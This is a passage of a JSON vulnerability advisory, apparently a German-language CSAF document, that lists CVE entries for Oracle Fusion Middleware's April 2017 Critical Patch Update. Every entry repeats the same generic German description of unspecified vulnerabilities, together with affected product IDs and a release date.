"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-6305"
},
{
"cve": "CVE-2016-6306",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-6306"
},
{
"cve": "CVE-2016-6307",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-6307"
},
{
"cve": "CVE-2016-6308",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-6308"
},
{
"cve": "CVE-2016-6309",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-6309"
},
{
"cve": "CVE-2016-7052",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-7052"
},
{
"cve": "CVE-2017-3230",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3230"
},
{
"cve": "CVE-2017-3499",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3499"
},
{
"cve": "CVE-2017-3506",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3506"
},
{
"cve": "CVE-2017-3507",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3507"
},
{
"cve": "CVE-2017-3531",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3531"
},
{
"cve": "CVE-2017-3540",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3540"
},
{
"cve": "CVE-2017-3541",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3541"
},
{
"cve": "CVE-2017-3542",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3542"
},
{
"cve": "CVE-2017-3543",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3543"
},
{
"cve": "CVE-2017-3545",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3545"
},
{
"cve": "CVE-2017-3553",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3553"
},
{
"cve": "CVE-2017-3554",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3554"
},
{
"cve": "CVE-2017-3591",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3591"
},
{
"cve": "CVE-2017-3593",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3593"
},
{
"cve": "CVE-2017-3594",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3594"
},
{
"cve": "CVE-2017-3595",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3595"
},
{
"cve": "CVE-2017-3596",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3596"
},
{
"cve": "CVE-2017-3597",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3597"
},
{
"cve": "CVE-2017-3598",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3598"
},
{
"cve": "CVE-2017-3601",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3601"
},
{
"cve": "CVE-2017-3602",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3602"
},
{
"cve": "CVE-2017-3603",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3603"
},
{
"cve": "CVE-2017-3625",
"notes": [
{
"category": "description",
